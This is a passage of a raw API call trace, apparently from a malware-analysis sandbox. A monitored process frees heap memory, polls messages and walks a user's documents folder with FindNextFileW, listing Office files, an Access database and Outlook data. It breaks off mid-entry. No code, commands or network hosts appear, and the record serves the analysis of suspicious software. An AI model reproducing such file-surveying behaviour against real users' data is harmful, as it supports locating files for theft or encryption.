HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6108 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.013] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.014] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x165c4830, ftCreationTime.dwHighDateTime=0x1d5c226, ftLastAccessTime.dwLowDateTime=0xd2602fe0, ftLastAccessTime.dwHighDateTime=0x1d552f2, ftLastWriteTime.dwLowDateTime=0xd2602fe0, ftLastWriteTime.dwHighDateTime=0x1d552f2, nFileSizeHigh=0x0, nFileSizeLow=0x67d6, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="4pPJKhvtklZXxwQ0M09.docx", cAlternateFileName="4PPJKH~1.DOC")) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6338 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0215.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.015] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2107f870, ftCreationTime.dwHighDateTime=0x1d5bce9, ftLastAccessTime.dwLowDateTime=0x73686bb0, ftLastAccessTime.dwHighDateTime=0x1d5d46b, ftLastWriteTime.dwLowDateTime=0x73686bb0, ftLastWriteTime.dwHighDateTime=0x1d5d46b, nFileSizeHigh=0x0, nFileSizeLow=0x632a, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ax_c.pptx", cAlternateFileName="AX_C~1.PPT")) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.015] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28aaa940, ftCreationTime.dwHighDateTime=0x1d586ea, ftLastAccessTime.dwLowDateTime=0x996d7d10, ftLastAccessTime.dwHighDateTime=0x1d563a9, ftLastWriteTime.dwLowDateTime=0x996d7d10, ftLastWriteTime.dwHighDateTime=0x1d563a9, nFileSizeHigh=0x0, nFileSizeLow=0x285b, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="cyaer-G0v.pptx", cAlternateFileName="CYAER-~1.PPT")) returned 1 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 1 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979fde90, ftCreationTime.dwHighDateTime=0x1d56be4, ftLastAccessTime.dwLowDateTime=0xedc4b1a0, ftLastAccessTime.dwHighDateTime=0x1d5ac8b, ftLastWriteTime.dwLowDateTime=0xedc4b1a0, ftLastWriteTime.dwHighDateTime=0x1d5ac8b, nFileSizeHigh=0x0, nFileSizeLow=0x96f7, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="faIAqUgP BwWKbX.docx", cAlternateFileName="FAIAQU~1.DOC")) returned 1 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.016] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadf7bf00, ftCreationTime.dwHighDateTime=0x1d5b5f4, ftLastAccessTime.dwLowDateTime=0x393cd1c0, ftLastAccessTime.dwHighDateTime=0x1d59f68, ftLastWriteTime.dwLowDateTime=0x393cd1c0, ftLastWriteTime.dwHighDateTime=0x1d59f68, nFileSizeHigh=0x0, nFileSizeLow=0x8ed4, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="iN034yd-ltTggQ-HcC.xlsx", cAlternateFileName="IN034Y~1.XLS")) returned 1 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d875f0, ftCreationTime.dwHighDateTime=0x1d5541d, ftLastAccessTime.dwLowDateTime=0x2e8b89d0, ftLastAccessTime.dwHighDateTime=0x1d54bdd, ftLastWriteTime.dwLowDateTime=0x2e8b89d0, ftLastWriteTime.dwHighDateTime=0x1d54bdd, nFileSizeHigh=0x0, nFileSizeLow=0x1688a, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="lmvGT20EAt7X97ts9.pptx", cAlternateFileName="LMVGT2~1.PPT")) returned 1 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc92a3740, ftCreationTime.dwHighDateTime=0x1d5cff2, ftLastAccessTime.dwLowDateTime=0x9529bd80, ftLastAccessTime.dwHighDateTime=0x1d5cc23, ftLastWriteTime.dwLowDateTime=0x9529bd80, ftLastWriteTime.dwHighDateTime=0x1d5cc23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Mpp4LjR5L7", cAlternateFileName="MPP4LJ~1")) returned 1 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.017] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa87f514a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddc1fe1e, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.018] PeekMessageW (in: lpMsg=0x8cf618, 